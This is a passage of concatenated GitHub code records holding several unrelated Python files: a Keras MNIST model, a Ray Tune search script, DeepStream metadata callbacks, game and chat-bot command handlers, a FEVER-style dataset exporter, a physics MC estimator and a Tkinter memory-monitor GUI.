activation=tf.nn.relu)) #number of neurons that we are gonna have in this layer - the more neurons the more complicated the layer becomes. The activation function is a simple rectify linear unit function\r\n#add the second hidden layer\r\nmodel.add(tf.keras.layers.Dense(units=128, activation=tf.nn.relu))\r\n#output layer\r\nmodel.add(tf.keras.layers.Dense(units=10, activation=tf.nn.softmax)) #this activation function is the function that tries to take all the outputs\r\n\r\n#we need to comple them all\r\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\r\n\r\n#fit the model\r\nmodel.fit(x_train, y_train, epochs=3) #the model is going to repeat the whole process 3 times\r\n\r\n#evaluate them all\r\nloss, accuracy = model.evaluate(x_test, y_test)\r\n\r\nprint(accuracy)\r\nprint(loss)\r\n\r\nmodel.save('digits.model')\r\n\r\n","repo_name":"mgichenko/HandWritten-Digit-Recognition","sub_path":"HandwrittenDigitRecognition.py","file_name":"HandwrittenDigitRecognition.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9889828637","text":"import copy\nimport pickle\nfrom typing import Dict\n\nimport pandas as pd\nfrom kaggle_airbnb.config import (default_irrelevant_features, model_path,\n results_path, test_data_path,\n train_data_path)\nfrom kaggle_airbnb.preprocess import preprocess_feature\nfrom ray import tune\nfrom ray.tune.schedulers.hb_bohb import HyperBandForBOHB\nfrom ray.tune.suggest.bohb import TuneBOHB\nfrom sklearn.model_selection import train_test_split\n\n\ndef get_opt_algo(name: str):\n scheduler = None\n opt_algo = None\n\n if name == \"bohb\":\n scheduler = HyperBandForBOHB(\n time_attr=\"training_iteration\",\n max_t=100,\n reduction_factor=4,\n stop_last_trials=False)\n opt_algo = tune.suggest.ConcurrencyLimiter(TuneBOHB(), max_concurrent=4)\n\n return scheduler, opt_algo\n\n\ndef train(config: Dict):\n # This is a simple training function to be passed into Tune\n # Load 
dataset\n df = pd.read_csv(train_data_path)\n irrelevant_features = config.pop('irrelevant_features')\n data = preprocess_feature(df, irrelevant_features)\n labels = df[\"Decision\"].to_numpy()\n\n algo_wrapper_cls = None\n # Split into train and test set\n train_x, test_x, train_y, test_y = train_test_split(\n data, labels, test_size=0.1)\n\n # Train the classifier, using the Tune callback\n algo_wrapper_cls = config.pop(\"algo_wrapper_cls\")\n algo = algo_wrapper_cls(config)\n algo.fit(train_x, train_y)\n test_acc = algo.evaluate(test_x, test_y)\n\n tune.report(acc=test_acc)\n algo.save(\"model.pkl\")\n\n\ndef get_best_model(analysis):\n best_logdir = analysis.get_best_logdir()\n with open(f\"{best_logdir}/model.pkl\", \"rb\") as f:\n best_model = pickle.load(f)\n accuracy = analysis.best_result[\"acc\"]\n print(f\"Best model parameters: {analysis.best_config}\")\n print(f\"Best model total accuracy: {accuracy:.4f}\")\n\n return best_model\n\n\ndef tune_algo(search_space: Dict,\n num_samples: int = 1000,\n n_cpus: int = 1):\n\n scheduler, opt_algo = get_opt_algo(\"bohb\")\n\n analysis = tune.run(\n train,\n metric=\"acc\",\n mode=\"max\",\n resources_per_trial={\"cpu\": n_cpus},\n config=search_space,\n num_samples=num_samples,\n scheduler=scheduler,\n search_alg=opt_algo\n )\n\n return analysis\n\n\ndef test(best_model, algo_name):\n df = pd.read_csv(test_data_path)\n\n features_to_remove = copy.copy(default_irrelevant_features)\n features_to_remove.remove(\"Decision\")\n x = preprocess_feature(df, features_to_remove)\n y = best_model.predict(x)\n\n res_dict = {\"id\": df.id, \"Decision\": y}\n res_df = pd.DataFrame.from_dict(res_dict)\n res_df.to_csv(f\"{results_path}/{algo_name}.csv\", index=False)\n best_model.save(f\"{model_path}/{algo_name}.pkl\")\n","repo_name":"Mushroom-Wang/kaggle-airbnb","sub_path":"kaggle_airbnb/tune.py","file_name":"tune.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6241610468","text":"import pyds\nimport sys\n\nMAX_TIME_STAMP_LEN = 32\n\n# Callback function for deep-copying an NvDsEventMsgMeta struct\ndef meta_copy_func(data, user_data):\n # Cast data to pyds.NvDsUserMeta\n user_meta = pyds.NvDsUserMeta.cast(data)\n src_meta_data = user_meta.user_meta_data\n # Cast src_meta_data to pyds.NvDsEventMsgMeta\n srcmeta = pyds.NvDsEventMsgMeta.cast(src_meta_data)\n # Duplicate the memory contents of srcmeta to dstmeta\n # First use pyds.get_ptr() to get the C address of srcmeta, then\n # use pyds.memdup() to allocate dstmeta and copy srcmeta into it.\n # pyds.memdup returns C address of the allocated duplicate.\n dstmeta_ptr = pyds.memdup(pyds.get_ptr(srcmeta),\n sys.getsizeof(pyds.NvDsEventMsgMeta))\n # Cast the duplicated memory to pyds.NvDsEventMsgMeta\n dstmeta = pyds.NvDsEventMsgMeta.cast(dstmeta_ptr)\n\n # Duplicate contents of ts field. Note that reading srcmeat.ts\n # returns its C address. This allows to memory operations to be\n # performed on it.\n dstmeta.ts = pyds.memdup(srcmeta.ts, MAX_TIME_STAMP_LEN + 1)\n\n # Copy the sensorStr. This field is a string property. The getter (read)\n # returns its C address. 
The setter (write) takes string as input,\n # allocates a string buffer and copies the input string into it.\n # pyds.get_string() takes C address of a string and returns the reference\n # to a string object and the assignment inside the binder copies content.\n dstmeta.sensorStr = pyds.get_string(srcmeta.sensorStr)\n\n if srcmeta.objSignature.size > 0:\n dstmeta.objSignature.signature = pyds.memdup(\n srcmeta.objSignature.signature, srcmeta.objSignature.size)\n dstmeta.objSignature.size = srcmeta.objSignature.size\n \n return dstmeta\n\n\n# Callback function for freeing an NvDsEventMsgMeta instance\ndef meta_free_func(data, user_data):\n user_meta = pyds.NvDsUserMeta.cast(data)\n srcmeta = pyds.NvDsEventMsgMeta.cast(user_meta.user_meta_data)\n\n # pyds.free_buffer takes C address of a buffer and frees the memory\n # It's a NOP if the address is NULL\n pyds.free_buffer(srcmeta.ts)\n pyds.free_buffer(srcmeta.sensorStr)\n\n if srcmeta.objSignature.size > 0:\n pyds.free_buffer(srcmeta.objSignature.signature)\n srcmeta.objSignature.size = 0\n \n\ndef generate_event_msg_meta(obj_meta, frame_meta):\n msg_meta = pyds.alloc_nvds_event_msg_meta()\n msg_meta.bbox.top = obj_meta.rect_params.top\n msg_meta.bbox.left = obj_meta.rect_params.left\n msg_meta.bbox.width = obj_meta.rect_params.width\n msg_meta.bbox.height = obj_meta.rect_params.height\n msg_meta.frameId = frame_meta.frame_num\n msg_meta.trackingId = obj_meta.object_id\n msg_meta.confidence = obj_meta.confidence\n \n msg_meta.sensorId = 0\n msg_meta.placeId = 0\n msg_meta.moduleId = 0\n msg_meta.sensorStr = \"sensor-0\"\n \n msg_meta.ts = pyds.alloc_buffer(MAX_TIME_STAMP_LEN + 1)\n pyds.generate_ts_rfc3339(msg_meta.ts, MAX_TIME_STAMP_LEN)\n\n msg_meta.type = pyds.NvDsEventType.NVDS_EVENT_ENTRY\n msg_meta.objType = pyds.NvDsObjectType.NVDS_OBJECT_TYPE_PERSON\n msg_meta.objClassId = obj_meta.class_id\n if obj_meta.class_id == 0:\n msg_meta.objType = pyds.NvDsObjectType.NVDS_OBJECT_TYPE_VEHICLE\n elif obj_meta.class_id == 2:\n msg_meta.objType = pyds.NvDsObjectType.NVDS_OBJECT_TYPE_PERSON\n \n return msg_meta","repo_name":"Serge3006/deepstream-kafka","sub_path":"pipeline/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"73409977690","text":"from .api import *\nfrom .xuanjing import *\nfrom .monster import *\n\nzones = on_command(\"jx3_zones_v1\", aliases={\"副本v1\"}, priority=5)\n\n@zones.handle()\nasync def _(bot: Bot, event: GroupMessageEvent, args: Message = CommandArg()):\n \"\"\"\n 获取玩家副本通关记录:\n\n Example:-副本v1 幽月轮 哭包猫@唯我独尊\n \"\"\"\n group_server = getGroupServer(str(event.group_id))\n arg = args.extract_plain_text().split(\" \")\n if len(arg) not in [1, 2]:\n await zones.finish(\"唔……参数不正确哦,请检查后重试~\")\n if len(arg) == 1:\n if group_server == False:\n await zones.finish(\"没有绑定服务器,请携带服务器参数使用!\")\n server = group_server\n id = arg[0]\n elif len(arg) == 2:\n server = arg[0]\n id = arg[1]\n data = await zone(server, id)\n if type(data) == type([]):\n await zones.finish(data[0])\n else:\n await zones.finish(ms.image(data))\n\nzonesv2 = on_command(\"jx3_zones\", aliases={\"副本\"}, priority=5)\n\n@zonesv2.handle()\nasync def _(event: GroupMessageEvent, args: Message = CommandArg()):\n group_server = getGroupServer(str(event.group_id))\n arg = args.extract_plain_text().split(\" \")\n if len(arg) not in [1, 2]:\n await zonesv2.finish(\"唔……参数不正确哦,请检查后重试~\")\n if len(arg) == 1:\n if group_server == False:\n await 
zonesv2.finish(\"没有绑定服务器,请携带服务器参数使用!\")\n server = group_server\n id = arg[0]\n elif len(arg) == 2:\n server = arg[0]\n id = arg[1]\n data = await zone_v2(server, id)\n if type(data) == type([]):\n await zonesv2.finish(data[0])\n else:\n await zonesv2.finish(ms.image(data))\n\ndrops = on_command(\"jx3_drops\", aliases={\"掉落列表\"}, priority=5)\n\n@drops.handle()\nasync def _(event: GroupMessageEvent, args: Message = CommandArg()):\n arg = args.extract_plain_text().split(\" \")\n if len(arg) != 3:\n await drops.finish(\"唔……参数不正确哦~\")\n map = arg[0]\n mode = arg[1]\n boss = arg[2]\n data = await generater(map, mode, boss)\n from nonebot.log import logger\n logger.info(data)\n if type(data) != type([]):\n await drops.finish(ms.image(data))\n else:\n await drops.finish(data[0])\n\nitem = on_command(\"jx3_itemdrop\", aliases={\"掉落\"}, priority=5)\n\n@item.handle()\nasync def _(event: GroupMessageEvent, args: Message = CommandArg()):\n group_server = getGroupServer(str(event.group_id))\n arg = args.extract_plain_text().split(\" \")\n if len(arg) not in [1, 2]:\n await item.finish(\"唔……参数不正确哦,请检查后重试~\")\n if len(arg) == 1:\n if group_server == False:\n await item.finish(\"没有绑定服务器,请携带服务器参数使用!\")\n server = group_server\n name = arg[0]\n elif len(arg) == 2:\n server = arg[0]\n name = arg[1]\n data = await get_item_record(server, name)\n if type(data) == type([]):\n await item.finish(data[0])\n else:\n await item.finish(ms.image(data))\n\nmonsters = on_command(\"jx3_monsters_v2\", aliases={\"百战\"}, priority=5)\n@monsters.handle()\nasync def _(event: GroupMessageEvent, args: Message = CommandArg()):\n img = await get_monsters_map()\n await monsters.finish(ms.image(img))","repo_name":"codethink-cn/Inkar-Suki","sub_path":"src/plugins/jx3/dungeon/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"32"} +{"seq_id":"71422785691","text":"import json\nfrom common.util import get_skill, join, split, skillable\nfrom time import asctime\n\ncustom = {}\ntry:\n with open('skills/custom/skills.json') as f:\n custom = json.load(f)\nexcept Exception:\n with open('skills/custom/skills.json', 'w+') as f:\n json.dump(custom, f, indent=2)\n\nskillDetails = '''[bcu]\"{name}\" details\n\n[cu]Output\n[c]{output}\n\n[cu]Created\n[c]{creation}\n\n[cu]Last modified\n[c]{modification}\n\n[cu]Author\n[c]<$@{author}$>\n'''\n\n@skillable\ndef run(data, context):\n '''\n Runs a custom skill.\n '''\n error = 'Custom skill not found'\n skill = context.sParams.lower()\n if skill not in custom.get(context.chatId, []):\n return {'message': error, 'replyTo': context.origin}\n result = custom[context.chatId][skill]['output']\n return {'message': result}\n\n@skillable\ndef learn(data, context):\n '''\n Learns a new custom skill.\n It saves the output of the skill as well as the nickname and details of the user who created it.\n '''\n syntaxError = \"Your custom skill's syntax is wrong.\"\n kiddoError = \"Don't get ahead of yourself, kiddo.\"\n temp = split(context.sParams, sep=',')\n if len(temp) < 2: \n return {'message': syntaxError, 'replyTo': context.origin}\n skill = temp[0].strip().lower()\n params = join(temp[1:], sep=',').strip()\n if params[0] == '$':\n return {'message': kiddoError, 'replyTo': context.origin}\n now = asctime()\n known = 're'\n if context.chatId not in custom:\n custom[context.chatId] = {}\n if skill not in custom[context.chatId]:\n known = ''\n custom[context.chatId][skill] = {\n 'creation': 
now\n }\n custom[context.chatId][skill].update({\n 'name': skill.capitalize(),\n 'output': params,\n 'author': context.author,\n 'authorId': context.authorId,\n 'modification': now\n })\n with open('skills/custom/skills.json', 'w+') as f:\n json.dump(custom, f, indent=2)\n result = f'The skill \"{skill}\" has just been {known}learnt.'\n return {'message': result, 'replyTo': context.origin}\n\n@skillable\ndef show(data, context):\n '''\n Lists all custom skills. If used with '-v', berbosity is added.\n '''\n isVerbose = context.sParams == '-v'\n result = '[BC]Custom skills' + (' (detailed)' if isVerbose else '') + '\\n\\n'\n temp = []\n for skill in custom.get(context.chatId, []):\n temp.append(f'- {skill}' + (f\": {custom[context.chatId][skill]['output']}\" if isVerbose else ''))\n if not temp:\n temp = '[CI]* No custom skills yet *'\n else:\n temp = join(sorted(temp), sep='\\n')\n result += temp\n return {'message': result}\n\n@skillable\ndef forget(data, context):\n '''\n Forgets a custom skill\n '''\n error = 'That custom skill does not exist.'\n skill = context.sParams.strip().lower()\n if skill not in custom.get(context.chatId, []):\n return {'message': error, 'replyTo': context.origin}\n custom[context.chatId].pop(skill)\n with open('skills/custom/skills.json', 'w+') as f:\n json.dump(custom, f, indent=2)\n result = f'The skill \"{skill}\" has been forgotten. You can rest in peace now.'\n return {'message': result}\n\n@skillable\ndef details(data, context):\n '''\n Shows the details of the skill and tags the user.\n '''\n error = 'That custom skill does not exist.'\n skill = context.sParams.strip().lower()\n if skill not in custom.get(context.chatId, []):\n return {'message': error, 'replyTo': context.origin}\n result = skillDetails.format(**custom[context.chatId][skill])\n return {'message': result, 'mentionUserIds': [custom[context.chatId][skill]['authorId']]}\n\nskills = {\n 'do': {\n 'desc': 'Runs a custom skill. Params: ',\n 'run': run\n },\n 'learn': {\n 'desc': 'Learns a custom skill. Usage: \\n[c]\"$learn , \"\"',\n 'run': learn\n },\n 'list': {\n 'desc': 'Lists custom skills. Optional param: -v',\n 'run': show\n },\n 'forget': {\n 'desc': 'Forgets a custom skill. Param: ',\n 'run': forget\n },\n 'skill-details': {\n 'desc': 'Tags the author of the custom skill. 
Param: ',\n 'run': details\n }\n}\n","repo_name":"fredrare/Antibot","sub_path":"skills/custom/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26088260997","text":"import sys\nsys.path.insert(1, './')\nimport django\nfrom django.conf import settings\nimport annotation_service.settings as app_settings\n\nsettings.configure(INSTALLED_APPS=app_settings.INSTALLED_APPS, DATABASES=app_settings.DATABASES)\ndjango.setup()\nfrom wf1.models import Claim\nfrom wf2.models import Label, ClaimState\nimport json, jsonlines\n\nprint(\"Running...\")\nused_pages = set()\nlabels = Label.objects.order_by(\"id\")\nused_hyperlinks = set()\n\nfor label in labels:\n used_pages.add(label.claim.page)\n used_pages.add(label.sentence.page)\n if not label.evidence:\n continue\n hyperlinks = label.evidence.hyperlinks.order_by(\"id\")\n sentences = label.evidence.sentences.order_by(\"id\")\n for hyperlink in hyperlinks:\n used_hyperlinks.add(hyperlink)\n for sentence in sentences:\n used_pages.add(sentence.page)\n\nnot_enough_info_claims = ClaimState.objects.filter(state=1).order_by(\"id\")\nfor not_enough_info_claim in not_enough_info_claims:\n used_pages.add(not_enough_info_claim.claim.page)\n\nwiki_pages = []\nfor used_page in used_pages:\n page = {\"id\": used_page.token, \"text\": used_page.page_content, \"lines\": \"\"}\n sentence_number = 0\n for sentence in used_page.sentences.order_by(\"id\"):\n page[\"lines\"] += f'{sentence_number}\\t{sentence.sentence_content}\\n'\n sentence_number += 1\n page[\"lines\"] += f'{sentence_number}\\t'\n wiki_pages.append(page)\n\nfor used_hyperlink in used_hyperlinks:\n hyperlink = {\"id\": f\"hyperlink_{used_hyperlink.token}\", \"text\": used_hyperlink.first_paragraph,\n \"lines\": f\"0\\t{used_hyperlink.first_paragraph}\\n1\\t\"}\n wiki_pages.append(hyperlink)\n\nwith open('wiki_pages.json', 'w', encoding='utf8') as f:\n json.dump(wiki_pages, f)\n\nwith jsonlines.open('wiki_pages.jsonl', mode='w') as writer:\n for wiki_page in wiki_pages:\n writer.write(wiki_page)\n\nprint(f'Number of used pages: {len(used_pages)}')\nprint(f'Number of used hyperlinks: {len(used_hyperlinks)}')\n\ndataset = []\nclaims = Claim.objects.order_by(\"id\")\nfor claim in claims:\n if len(claim.claim_state.all()) == 0:\n continue\n state = claim.claim_state.order_by(\"id\").first().state\n if state == 1:\n claim_json = {\"id\": claim.id, \"verifiable\": \"NOT VERIFIABLE\", \"label\": \"NOT ENOUGH INFO\",\n \"claim\": claim.claim_content, \"claim_page_id\": claim.page.id,\n \"claim_page_token\": claim.page.token,\n \"evidence\": [[[claim.page.id, None, None, None]]]}\n dataset.append(claim_json)\n elif state == 6:\n claim_json_supports = {\"id\": claim.id, \"verifiable\": \"VERIFIABLE\", \"label\": \"SUPPORTS\",\n \"claim\": claim.claim_content, \"claim_page_id\": claim.page.id,\n \"claim_page_token\": claim.page.token, \"evidence\": []}\n claim_json_refutes = {\"id\": claim.id, \"verifiable\": \"VERIFIABLE\", \"label\": \"REFUTES\",\n \"claim\": claim.claim_content, \"claim_page_id\": claim.page.id,\n \"claim_page_token\": claim.page.token, \"evidence\": []}\n supports = 0\n refutes = 0\n for label in claim.labels.order_by(\"id\"):\n evidences = [[claim.page.id, label.id, label.sentence.page.token,\n list(label.sentence.page.sentences.order_by(\"id\")).index(label.sentence)]]\n if label.evidence:\n for label_sentence in label.evidence.sentences.order_by(\"id\"):\n 
evidences.append([claim.page.id, label.id, label_sentence.page.token,\n list(label_sentence.page.sentences.order_by(\"id\")).index(label_sentence)])\n for label_hyperlink in label.evidence.hyperlinks.order_by(\"id\"):\n evidences.append([claim.page.id, label.id, f\"hyperlink_{label_hyperlink.token}\", 0])\n if label.label == 0:\n claim_json_supports[\"evidence\"].append(evidences)\n supports += 1\n else:\n claim_json_refutes[\"evidence\"].append(evidences)\n refutes += 1\n if supports > 0:\n dataset.append(claim_json_supports)\n if refutes > 0:\n dataset.append(claim_json_refutes)\n\nwith open('dataset.json', 'w', encoding='utf8') as f:\n json.dump(dataset, f)\n\nwith jsonlines.open('dataset.jsonl', mode='w') as writer:\n for label in dataset:\n writer.write(label)\n\nprint(f'Dataset length: {len(dataset)}')\nprint('Done!')\n","repo_name":"Zarharan/ParsFEVER","sub_path":"Tool/annotation_service/wf2/dataset_creator.py","file_name":"dataset_creator.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"14408687006","text":"# Logging\nimport logging\nlogger = logging.getLogger(__name__)\n\nfrom StopsDilepton.analysis.Region import Region\nfrom StopsDilepton.tools.u_float import u_float\nfrom StopsDilepton.analysis.SystematicEstimator import SystematicEstimator\nfrom StopsDilepton.analysis.SetupHelpers import channels, trilepChannels\n\n\nclass MCBasedEstimate(SystematicEstimator):\n def __init__(self, name, sample, cacheDir=None):\n super(MCBasedEstimate, self).__init__(name, cacheDir=cacheDir)\n self.sample=sample\n # FastSim and 76X only for the MCBasedEstimate. Dirty. Looks whether one of the samples is fastsim.\n self.isFastSim = getattr(sample, \"isFastSim\", False) \n \n def _estimate(self, region, channel, setup):\n\n ''' Concrete implementation of abstract method 'estimate' as defined in Systematic\n '''\n\n logger.debug( \"MC prediction for %s channel %s\" %(self.name, channel) )\n\n if channel=='all':\n # 'all' is the total of all contributions\n return sum([self.cachedEstimate(region, c, setup) for c in (trilepChannels if setup.parameters['triLep'] else channels)])\n\n elif channel=='SF':\n # 'all' is the total of all contributions\n return sum([self.cachedEstimate(region, c, setup) for c in ['MuMu', 'EE']])\n\n else:\n preSelection = setup.preselection('MC', channel=channel, isFastSim = self.isFastSim)\n cut = \"&&\".join([region.cutString(setup.sys['selectionModifier']), preSelection['cut']])\n weight = preSelection['weightStr']\n\n logger.debug( \"Using cut %s and weight %s\"%(cut, weight) )\n return setup.lumi/1000.*u_float(**self.sample.getYieldFromDraw(selectionString = cut, weightString = weight) )\n","repo_name":"HephyAnalysisSW/StopsDilepton","sub_path":"analysis/python/MCBasedEstimate.py","file_name":"MCBasedEstimate.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42420125165","text":"\n##### Bibliotecas Utilizadas #####\n##################################\nimport socket\nfrom tkinter import *\nfrom threading import Thread\nimport threading\nimport time\nimport json\n##################################\n\n\"\"\"\ncreateVisualMemory\nFuncion encargada de crear los objetos\nque representan cada bloque de memoria\ndel vHeap, en funcion del tamaño de\ny de la divison.\n\n@author Fabian A. 
Solano Madriz\n@Param Size tamaño del vHeap\n@Param MemDivision tamaño de cada bloque de memoria\n\"\"\"\ndef createVisualMemory(Size,MemDivision):\n global MemoryBlockList,memoryCanvas,numMemoryBlocks\n \n def getMemBlocks(Size,MemDivision):\n result=Size/MemDivision\n if(isinstance(result,int)):\n return int(result)\n else:\n return int(result)+1\n\n\n numMemoryBlocks = getMemBlocks(Size,MemDivision) #Cantidad Total de Bloques\n MemoryChunckSize = (numMemoryBlocks*30) #Cantidad Total de Pixeles para todos los bloques\n HalfMemoryChunckSize = MemoryChunckSize/2 #Mita de la Cantidad total de Pixeles\n scrRegion=(0,0,400,MemoryChunckSize+(MemoryChunckSize*.005))#Region de Scroll\n #Total de Pixeles + un 0.005\n\n print(\"NUMERO DE BLOQUE DE MEMORIA \" + str(numMemoryBlocks))\n print(\"TAMAÑO DEL CANVAS DE MEMORIA \" + str(MemoryChunckSize))\n \n memoryCanvas = Canvas(window, width=300, height=600,borderwidth=0,\n highlightthickness=0,bg=\"#06072B\")\n\n memoryCanvas.config(scrollregion=scrRegion)\n memoryCanvas.pack(padx=1,pady=0)\n \n coordsInfo = [5,5,180,30,numMemoryBlocks] #Lista con Valores de Coordenadas(Cambian en cada iteracion)\n MemoryBlockList = [] #Lista de Bloques de Memoria (objetos Canvas)\n\n\n ##### Ciclo Dibujo de Bloques de Memoria ###################################################\n ############################################################################################\n iterator = 1;\n while coordsInfo[4] != 0: #Mientras que la cantidad de bloque sea != 0\n\n #Crea el bloque en las coordenadas correspondientes\n blockGUI = memoryCanvas.create_rectangle(coordsInfo[0],\n coordsInfo[1],\n coordsInfo[2],\n coordsInfo[3],width=0, fill=\"white\")\n block = [blockGUI,False]\n MemoryBlockList.append(block) #Añade el bloque creado a la lista\n coordsInfo[1] += 30 #Aumenta las coordenadas en 30\n coordsInfo[3] += 30\n coordsInfo[4] -= 1 #Reduce el numero de elementos crear\n \n porcentajeCompletado = (iterator*100)/numMemoryBlocks\n fillLoadingBars(porcentajeCompletado,MemDivision)\n iterator+=1\n ############################################################################################\n ################################# UI Elements ##############################################\n ############################################################################################\n memoryCanvas.place(x=15,y=3) #Coloca el canvas en posicion correcta\n hbar=Scrollbar(window,orient=VERTICAL) #Crea el scrollbar para el canvas\n hbar.pack(side=LEFT,fill=Y) #Coloca el scrollbar a la izquierda\n hbar.config(command=memoryCanvas.yview) #Añade el canvas al scrollbar\n memoryCanvas.config(yscrollcommand=hbar.set)#Añade el scrollbar al canvas\n loadScreen.destroy() #Destruye la ventana de carga\n\n global entry,TotalBar\n contenedor.create_text(505, 40, anchor=W, font=\"Arial\",text=\"Memory Usage\")\n contenedor2 = Canvas(window,width=250, height=400, bg=\"#06072B\")\n contenedor2.place(x=500,y=50)\n \n TotalBar = Canvas(window,width=240, height=390, bg=\"#FFFFFF\")\n TotalBar.place(x=505,y=55)\n\n for i in range(0,11):\n TotalBar.create_text(5, 370-(i*35), anchor=W, font=\"Arial\",text=str(i*10)+\"%\")\n\n botonA = Button(window,width=7,height=2,command=debugSetMemoryBlock,text=\"Change\",bg=\"#000000\",fg=\"#FFFFFF\")\n botonA.place(x=335,y=550)\n\n entry = Entry(window)\n entry.place(x=420,y=560)\n ############################################################################################\n\"\"\"\nsetMemoryBlock\nFuncion encargada de actualizar el\nvalor de n bloques de memoria. 
Ya sea\nque se encuentra algun datos almacenado\no que el bloque se encuentra libre\n\n@author Fabian A. Solano Madriz\n@Param pUsageFlag Indica si hay un dato almacenado\n@Param pStart posicion inicial de bloque a actualizar\n@Param pEnd posicion final de bloque a actualizar\n\"\"\"\ndef setMemoryBlock(pUsageFlag,pStart,pEnd):\n global MemoryBlockList,memoryCanvas,entry\n if(pUsageFlag == True):\n for i in range(pStart,pEnd):\n memoryCanvas.itemconfig(MemoryBlockList[i][0],fill=\"red\")\n MemoryBlockList[i][1] = True\n else:\n for i in range(pStart,pEnd):\n memoryCanvas.itemconfig(MemoryBlockList[i][0],fill=\"white\")\n MemoryBlockList[i][1] = False\n setMemoryGraphicBar()\n \ndef debugSetMemoryBlock():\n global MemoryBlockList,memoryCanvas,entry\n data = entry.get()\n data= data.split(\"#\")\n pStart = int(data[1])\n pEnd = int(data[2])\n \n if(data[0] == \"True\"):\n for i in range(pStart,pEnd):\n memoryCanvas.itemconfig(MemoryBlockList[i][0],fill=\"red\")\n MemoryBlockList[i][1] = True\n else:\n for i in range(pStart,pEnd):\n memoryCanvas.itemconfig(MemoryBlockList[i][0],fill=\"white\")\n MemoryBlockList[i][1] = False\n entry.delete(0, 'end')\n setMemoryGraphicBar()\n \ndef setMemoryGraphicBar():\n \n global MemoryBlockList,numMemoryBlocks,TotalBar\n blocksUsed = 0\n for i in range(0,len(MemoryBlockList)):\n if(MemoryBlockList[i][1] == True):\n blocksUsed+=1\n \n porcentajeCompletado = (blocksUsed*100)/numMemoryBlocks\n print(\"Porcentaje: \" + str(porcentajeCompletado))\n\n Pos = 370-((porcentajeCompletado*350)/100)\n print(\"Posicion: \" + str(Pos))\n TotalBar.delete(\"Bar\")\n TotalBar.create_rectangle(75,380,150,Pos,width=0, fill=\"green\",tags=\"Bar\")\n print(\"FINISHED\")\ndef createGUI(Size,MemDivision):\n x= Thread(target=createVisualMemory, args=(Size,MemDivision))\n x.daemon = True\n x.start()\n \ndef manageData(pData):\n global xStart\n pData = pData.split(\"#\")\n if(xStart == False):\n xStart = True\n if(pData[0] == \"xStart\"):\n startViewer(int(pData[1]),int(pData[2]))\n if(pData[0] == \"true\"):\n setMemoryBlock(True,int(pData[1]),int(pData[2]))\n \n \n \ndef start_HOST():\n global server\n HOST = \"\"\n PORT = 7070\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n server.bind((\"\", PORT))\n except socket.error as msg:\n print (('Failed to create socket. 
Error code: ' + str(msg[0]) +\n ' , Error message : ' + msg[1]))\n\n server.listen(10)\n print(\"Now Listening\")\n \ndef listen():\n while True:\n conn, addr = server.accept()\n while True:\n data = conn.recv(4096)\n data = data.decode(\"utf-8\")\n \n if(data != \"\"):\n print(data)\n manageData(data)\n #time.sleep()\n server.close()\n\n\ndef start_loop():\n a= Thread(target=listen, args=())\n a.daemon = True\n a.start()\n\n\n#############################################################################\n####################### Graphical User Interface ############################\n#############################################################################\n\n\n######################## Loading Screen ##############################\ndef fillLoadingBars(ptr,numMemBlocks):\n #print(\"PORCENTAJE \" + str(ptr))\n bloque = int(ptr*20/100)\n #print(\"Bloque: \" + str(bloque))\n for i in range(0,bloque):\n loadCanvas.itemconfig(loadBar[i],fill=\"green\")\n splashCanvas.itemconfig(txtPercentaje,text=str(int(ptr))+\"%\")\n if(ptr==100):\n window.deiconify()\ndef start_LoadBar():\n global loadScreen,splashCanvas\n loadScreen = Toplevel()\n loadScreen.title(\"Memory Monitor LDMM\")\n loadScreen.geometry(\"500x200+450+250\")\n loadScreen.resizable(width=FALSE, height=FALSE)\n\n splashCanvas = Canvas(loadScreen, width=500, height=200, bg=\"#FFFFFF\")\n splashCanvas.place(x=0,y=0)\n\n global loadCanvas,loadBar,txtPercentaje\n\n splashCanvas.create_text(20, 70, anchor=W, font=\"Arial\",text=\"Percentage:\")\n txtPercentaje = splashCanvas.create_text(115, 70, anchor=W, font=\"Arial\",text=\"0\")\n \n loadBar=[]\n loadCanvas = Canvas(splashCanvas, width=400, height=50, bg=\"#000000\")\n loadCanvas.place(x=50,y=90)\n c=[1,1,20,50] #Coordenas de Creacion de Barras de Carga\n for i in range(0,20):\n ob = loadCanvas.create_rectangle(c[0],c[1],c[2],c[3],width=0, fill=\"white\")\n c[0]+=20\n c[2]+=20\n loadBar.append(ob)\n loadScreen.withdraw()\ndef startViewer(vHeapSize,MemDivision):\n loadScreen.deiconify()\n createGUI(vHeapSize,MemDivision)\n window.withdraw()\n\n#################################################################################\n############################## Initial Setup ####################################\n#################################################################################\n\nglobal window,contenedor,xStart\nwindow = Tk()\nwindow.title(\"Memory Monitor LDMM\")\nwindow.geometry(\"800x600+250+100\")\nwindow.resizable(width=TRUE, height=FALSE)\n\nxStart = False\n\ncontenedor = Canvas(window, width=800, height=600, bg=\"#A8A79E\")\ncontenedor.place(x=0,y=0)\n\n\n\n\n\nstart_LoadBar()\nstart_HOST()\nstart_loop()\nwindow.mainloop()\n","repo_name":"dutsuwak/lightweight-memory-manager","sub_path":"src/com.LDMM.GUI/MemMonitor.py","file_name":"MemMonitor.py","file_ext":"py","file_size_in_byte":9804,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22102646705","text":"from colr import Colr as colr\nfrom time import sleep as sleep\n\n\nclass Colors:\n def red(self):\n print(colr().hex(\"#ff0000\", self, rgb_mode=True))\n\n def rose(self):\n print(colr().hex(\"#ff0066\", self, 